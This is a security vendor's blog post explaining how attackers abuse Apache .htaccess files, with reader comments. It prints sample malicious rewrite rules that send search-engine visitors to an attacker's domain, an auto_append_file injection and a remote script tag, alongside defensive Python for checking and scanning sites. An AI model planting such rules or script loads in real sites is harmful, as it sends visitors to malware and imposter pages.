• Experts Explain: .htaccess Attacks

    This is the fifth part in our series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

    In this article we look at a very common method used against legitimate websites: .htaccess redirection. An attacker who has gained write access to a site's files edits its .htaccess so that visitors are silently sent to another site under the attacker's control, typically one that serves malware or impersonates a site the visitor trusts.

    What is the purpose of the .htaccess file?
    Websites are served by software called a “web server”. A web server receives requests for web pages from browsers such as Internet Explorer, Google Chrome or Firefox, and sends the requested page back to the visitor. There are many different web servers, including IIS, NGINX and Apache, to name a few; Apache is the most popular.

    Many web servers support a per-directory configuration file. On Apache this file is named “.htaccess”. It holds directives that control how the files in that directory (and, unless overridden, its subdirectories) are served and to whom. For example, it can stop users from viewing certain pages, or redirect requests for a page that is under construction to a placeholder page. Because Apache reads the file on every request, a change to it takes effect immediately and without restarting the server, which is convenient for webmasters and equally convenient for an attacker.

    How are .htaccess files used?
    The .htaccess file lets you configure how visitors access the pages on your website: whether they may list the contents of certain directories, whether particular requests are redirected or answered with an error page (such as 404 Not Found), and more.

    Webmasters often use .htaccess files to block web crawlers, automated spiders and malicious bots from reading the site's content, and to prevent “hotlinking” of images (other sites embedding your images and consuming your bandwidth), as in the rules below. These are mod_rewrite directives, so they take effect only if mod_rewrite is loaded and the server configuration permits rewrite rules in .htaccess (AllowOverride FileInfo).

    # Allow image requests that carry no Referer (direct visits, privacy settings)
    # or a Referer on our own domain; answer every other image request with 403.
    RewriteEngine on
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{HTTP_REFERER} !^https?://(www\.)?mysite\.com/ [NC]
    RewriteRule \.(png|gif|jpe?g)$ - [F]
    

    How is the .htaccess file used by malicious hackers?
    Using the .htaccess file, an attacker who has gained write access to your site can redirect your visitors to another website. Typically a few malicious lines are appended to an otherwise legitimate .htaccess file. The rewrite rules themselves do not infect anyone; the destination does, by serving malware or an imposter page to the redirected browser, and the visitor is left confused about which site they are actually on.

    Before inserting the malicious code, attackers sometimes prepend a large number of empty lines so that the malicious entries sit far below the first screen when the file is opened in an editor. Search the entire “.htaccess” file for malware, not just the lines at the top, and check the .htaccess files in every subdirectory as well as the one in the document root.

    What does a .htaccess file look like?
    A typical .htaccess file looks like the commented example below. Every directive in it is commented out with “#”, so nothing takes effect until the comment marker is removed; that also means any check you run over the file must tell commented lines apart from live ones.

    An example:

    ### NOTE: Order/Allow/Deny/Satisfy below are Apache 2.2 access-control syntax; on Apache 2.4 use Require ... instead ###
    ### BASIC PASSWORD PROTECTION ###
    #AuthType basic
    #AuthName "prompt"
    #AuthUserFile /.htpasswd
    #AuthGroupFile /dev/null
    #Require valid-user
    
    ### ALLOW FROM IP OR VALID PASSWORD ###
    #Require valid-user
    #Allow from 192.168.1.23
    #Satisfy Any
    
    ### PROTECT FILES ###
    #<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
    #  Order Allow,Deny
    #  Deny from all
    #</FilesMatch>
    
    ### PREVENT HOTLINKING ###
    #SetEnvIfNoCase Referer "^http://subdomain.domain.tld/" good
    #SetEnvIfNoCase Referer "^$" good
    #<FilesMatch "\.(png|jpg|jpeg|gif|bmp|swf|flv)$">
    #   Order Deny,Allow
    #   Deny from all
    #   Allow from env=good
    #   (only one ErrorDocument 403 takes effect; the last one listed wins)
    #   ErrorDocument 403 http://www.google.com/intl/en_ALL/images/logo.gif
    #   ErrorDocument 403 /images/you_bad_hotlinker.gif
    #</FilesMatch>
    
    ### LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK ###
    ### value in bytes, 0-2147483647 (2GB); Apache does not accept a trailing comment on a directive line ###
    #LimitRequestBody 10240000
    

    How can I identify if my .htaccess file is infected?
    Malicious code in an .htaccess file can look like the example below. The “RewriteCond” lines test the Referer header of each request against a list of search engines; the “RewriteRule” then sends any request whose Referer matched to “hxxp://sokoloperkovuskeci.com/in.php” as an external redirect (flag R).

    This means visitors arriving from a search result on Ask, Google, MSN, Bing and the other engines listed are redirected to the attacker's site, while visitors who type the address directly, follow a bookmark or arrive from any other site see the normal page. The site's own administrator, who rarely reaches the site through a search engine, therefore sees nothing wrong, which is why these infections often go unnoticed. The “RewriteOptions inherit” line additionally pulls in rewrite rules from the parent directory's configuration, so copies of this block in subdirectories keep the redirect working throughout the site.

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo.*$ [NC]
    RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
    </IfModule>
    

    Popular .htaccess attacks have directed users to: xccgtswgokoe, villusoftreit.ru, and globalpoweringgatheringon.com.
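    To make the conditional nature of this redirect concrete, here is an added example (not code from the original post) that evaluates a copy of the rule block above against a few constructed requests. It implements just enough of mod_rewrite's RewriteCond/RewriteRule handling (the NC and OR flags, negated conditions, the R and L rule flags) to show who is redirected; the Referer strings and the host names example.com and news.example.org are assumptions made for the example.

```python
"""Which visitors does a referer-keyed .htaccess redirect actually affect?

Added example, not code from the original post: it evaluates a copy of the
malicious rule block quoted above against constructed requests, applying the
RewriteCond chain with mod_rewrite's [NC] and [OR] semantics. Only the subset
of mod_rewrite syntax the sample (and the hotlink rule) uses is implemented.
"""
import re

# Copy of the rules quoted in the post, constructed for this example; the post
# removed the query string of the redirect target, so it is omitted here too.
MALICIOUS_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo.*$ [NC]
RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php [R,L]
</IfModule>
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)


def _flags(text):
    return [f.strip().upper() for f in (text or "").split(",") if f.strip()]


def parse_rules(text):
    """Return [(conditions, rule)]: conditions is a list of (regex, negated, or_flag)
    tuples guarding the following RewriteRule; rule is (pattern, target, flags)."""
    rules, pending = [], []
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            pattern, flags = m.group(1), _flags(m.group(2))
            regex = re.compile(pattern.lstrip("!"), re.I if "NC" in flags else 0)
            pending.append((regex, pattern.startswith("!"), "OR" in flags))
            continue
        m = RULE_RE.match(line)
        if m:
            flags = _flags(m.group(3))
            pattern = re.compile(m.group(1), re.I if "NC" in flags else 0)
            rules.append((pending, (pattern, m.group(2), flags)))
            pending = []
    return rules


def conditions_hold(conditions, referer):
    """mod_rewrite semantics: [OR] joins a condition with the next one; otherwise
    every condition (or OR-group) must hold for the rule to fire."""
    group = False
    for regex, negated, or_flag in conditions:
        group = group or (bool(regex.search(referer)) != negated)
        if or_flag:
            continue
        if not group:
            return False
        group = False
    return True


def redirect_target(htaccess_text, path, referer):
    """Return the redirect target for a request, or None when the page is served
    normally. referer is "" when the browser sends no Referer header."""
    for conditions, (pattern, target, flags) in parse_rules(htaccess_text):
        if pattern.search(path) and conditions_hold(conditions, referer):
            if any(f.split("=")[0] == "R" for f in flags):
                return target
            if "L" in flags:
                break
    return None


# Constructed requests: (who, requested path, Referer header or "" if none)
REQUESTS = [
    ("site owner typing the address", "index.php", ""),
    ("visitor from a Google search", "index.php", "http://www.google.com/search?q=example"),
    ("visitor from a Bing search", "about/", "https://www.bing.com/search?q=example"),
    ("visitor following an internal link", "about/", "http://www.example.com/index.php"),
    ("visitor from an unrelated site", "index.php", "http://news.example.org/story"),
]


def classify(htaccess_text=MALICIOUS_HTACCESS, requests=REQUESTS):
    """Map each request description to its redirect target (None = served normally)."""
    return {who: redirect_target(htaccess_text, path, ref) for who, path, ref in requests}


if __name__ == "__main__":
    for who, target in classify().items():
        print(f"{who:36} -> {'REDIRECT to ' + target if target else 'normal page'}")
```

    Run it and the owner's direct request, the internal link and the unrelated referrer all come back as normal pages, while the two search-engine visitors are redirected; checking your site from a bookmark therefore proves nothing. The evaluator also handles negated conditions, so it can be pointed at the hotlinking rules earlier in the article to confirm that a request with an empty Referer is not blocked.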

    A second technique does not redirect at all. It uses the .htaccess file to change the PHP setting “auto_append_file” so that a local file chosen by the attacker is executed at the end of every PHP script on the site, and whatever that file outputs is appended to every page. This only works when PHP runs as an Apache module (mod_php): when PHP runs under CGI or FPM the “php_value” directive is not recognised in .htaccess and the server answers requests with an error instead, which is itself a sign worth investigating.

    An example:

    php_value auto_append_file "/tmp/661829.php"
    

    This configuration runs “/tmp/661829.php” after every PHP script on the site and appends its output to the page. Note that the payload lives in /tmp, outside the document root, so a scan limited to the web directory will not find it.

    The PHP file could be as small as the line below, which loads the attacker's JavaScript from a remote host under a file name chosen to look like the jQuery library:

    <script src="hxxp://nicomagen.cz.cc/jquery.js"></script>
    

    How do I detect if my site is vulnerable?
    Monitor your site for unexpected redirects and keep a known-good copy of every .htaccess file so you can compare it with what is on the server. Because the redirect shown above triggers only for search-engine referrers, test the way a visitor would arrive: request the page with a Referer header from a search engine and check whether the response is a redirect to a host you do not own, rather than simply opening the site yourself.
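    Here is an added example, not code from the original post or from StopTheHacker's service, that automates the checks this section and the earlier ones describe (the blank-line padding trick, the search-engine-keyed redirect, the auto_append_file injection): a scanner that walks a web root, inspects every .htaccess including those in subdirectories, ignores commented-out directives, and compares each file with a known-good hash. The web root, host names (mysite.com) and file contents it uses are constructed for the example.

```python
"""Scan a web root for .htaccess files showing the indicators discussed above.

Added example, not code from the original post or StopTheHacker's service. It
reads every .htaccess under a directory (subdirectories included) and flags
blank-line padding, rewrites or error documents pointing at another host,
RewriteCond lines keyed on search-engine referers, and php_value lines setting
auto_append_file/auto_prepend_file, optionally comparing each file with a
known-good hash. All paths, hosts and file contents below are constructed.
"""
import hashlib
import os
import re
import tempfile

SEARCH_ENGINES = ("google", "bing", "yahoo", "msn", "ask.com", "aol", "live.com", "altavista", "excite")
PHP_INCLUDE_RE = re.compile(r"^php_(?:value|flag|admin_value)\s+auto_(?:append|prepend)_file\b", re.I)
REWRITE_OFFSITE_RE = re.compile(r"^RewriteRule\s+\S+\s+(?:hxxp|https?|ftp)://([^/\s]+)", re.I)
ERRORDOC_OFFSITE_RE = re.compile(r"^ErrorDocument\s+\d{3}\s+(?:hxxp|https?)://([^/\s]+)", re.I)
REFERER_COND_RE = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)


def scan_htaccess(text, own_hosts=(), padding_threshold=20):
    """Return [(indicator, detail)] for one .htaccess body."""
    findings, lines = [], text.splitlines()
    # Padding: attackers prepend blank lines so the payload sits below the first screen.
    leading_blank = next((i for i, l in enumerate(lines) if l.strip()), len(lines))
    if leading_blank >= padding_threshold:
        findings.append(("leading-blank-padding", f"{leading_blank} blank lines before the first directive"))
    referer_conds = []
    for no, line in enumerate(lines, 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # comments never take effect (the benign example above is all comments)
        if PHP_INCLUDE_RE.match(stripped):
            findings.append(("php-auto-include", f"line {no}: {stripped}"))
        m = REWRITE_OFFSITE_RE.match(stripped) or ERRORDOC_OFFSITE_RE.match(stripped)
        if m and m.group(1).lower() not in own_hosts:
            findings.append(("redirect-off-site", f"line {no}: {stripped}"))
        m = REFERER_COND_RE.match(stripped)
        if m and any(engine in m.group(1).lower() for engine in SEARCH_ENGINES):
            referer_conds.append(no)
    if referer_conds:
        findings.append(("search-engine-referer-condition", f"lines {referer_conds} test for search-engine referers"))
    return findings


def scan_tree(root, own_hosts=(), baseline=None):
    """Scan every .htaccess under root. baseline maps relative path -> sha256 of the
    known-good copy; files missing from it or differing from it are reported too."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        full = os.path.join(dirpath, ".htaccess")
        rel = os.path.relpath(full, root).replace(os.sep, "/")
        with open(full, "rb") as fh:
            raw = fh.read()
        findings = scan_htaccess(raw.decode("utf-8", "replace"), own_hosts)
        if baseline is not None and rel not in baseline:
            findings.append(("not-in-baseline", "no known-good copy of this file"))
        elif baseline is not None and baseline[rel] != hashlib.sha256(raw).hexdigest():
            findings.append(("differs-from-baseline", "changed since the known-good copy"))
        if findings:
            report[rel] = findings
    return report


def build_sample_tree():
    """Create a throwaway web root (constructed): a clean root .htaccess, a padded
    search-engine redirect in blog/, and an auto_append_file injection in shop/."""
    root = tempfile.mkdtemp(prefix="htaccess-scan-")
    clean = ("RewriteEngine on\n"
             "RewriteCond %{HTTP_REFERER} !^$\n"
             "RewriteCond %{HTTP_REFERER} !^https?://(www\\.)?mysite\\.com/ [NC]\n"
             "RewriteRule \\.(png|gif|jpe?g)$ - [F]\n"
             "RewriteRule ^old\\.html$ https://www.mysite.com/new.html [R=301,L]\n"
             "#ErrorDocument 403 http://www.google.com/intl/en_ALL/images/logo.gif\n")
    redirect = "\n" * 40 + ("<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteOptions inherit\n"
                            "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\n"
                            "RewriteCond %{HTTP_REFERER} .*bing.com.*$ [NC]\n"
                            "RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php [R,L]\n</IfModule>\n")
    appended = clean + 'php_value auto_append_file "/tmp/661829.php"\n'
    for rel, body in ((".htaccess", clean), ("blog/.htaccess", redirect), ("shop/.htaccess", appended)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body.encode())
    clean_hash = hashlib.sha256(clean.encode()).hexdigest()
    # Baseline taken before the compromise: root and shop were clean, blog had no .htaccess yet.
    return root, {".htaccess": clean_hash, "shop/.htaccess": clean_hash}


def run_demo():
    root, baseline = build_sample_tree()
    return scan_tree(root, own_hosts={"mysite.com", "www.mysite.com"}, baseline=baseline)


if __name__ == "__main__":
    for path, findings in sorted(run_demo().items()):
        print(path, *(f"\n  [{ind}] {detail}" for ind, detail in findings))
```

    Point scan_tree at your real document root, pass your own host names in own_hosts so legitimate redirects to your own domain are not reported, and build the baseline from hashes of the .htaccess files in a clean backup. Pair it with a request-level check that sends a search-engine Referer, for example curl -sI -e 'https://www.google.com/' http://www.example.com/ (host name assumed), and look for a Location header pointing at a host you do not own.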

    Additionally, scan your website for application-level vulnerabilities such as SQL injection and cross-site scripting. These are the holes through which attackers break into a site in the first place and gain the ability to modify files such as .htaccess, turning your site into a distribution point for malware.

    Conclusion
    .htaccess redirection is a common way for attackers to abuse and infect websites. We have seen what .htaccess files are, how attackers misuse them, and how to check and protect your website.

    StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

    • Nice information about security of .htaccess
      Thank you for sharing.

      Posted by Ivoci on February 14th

    • […] Check .htaccess file for compromise (more information here) […]

      Posted by stopthehacker.com | Cleaning up malware-infected Wordpress sites on June 19th

    • I found the malicious code in the .htaccess file, I erased it, uploaded my file again, and some minutes after, the code was back again… I tried to erase it again, and it appeared a few minutes later. Any ideas on what is causing this? I just can’t get rid of it because it keeps being injected.

      Posted by Suriplanta on October 12th

    • […] into Android” is appearing as “unsafe” for users. The attack is known as “.htaccess code injection“, and it used to redirect to spam sites. Luckily the JavaScript and PHP files of the site are […]

      Posted by About recent “.htaccess” attacks | Get into Android blog on February 17th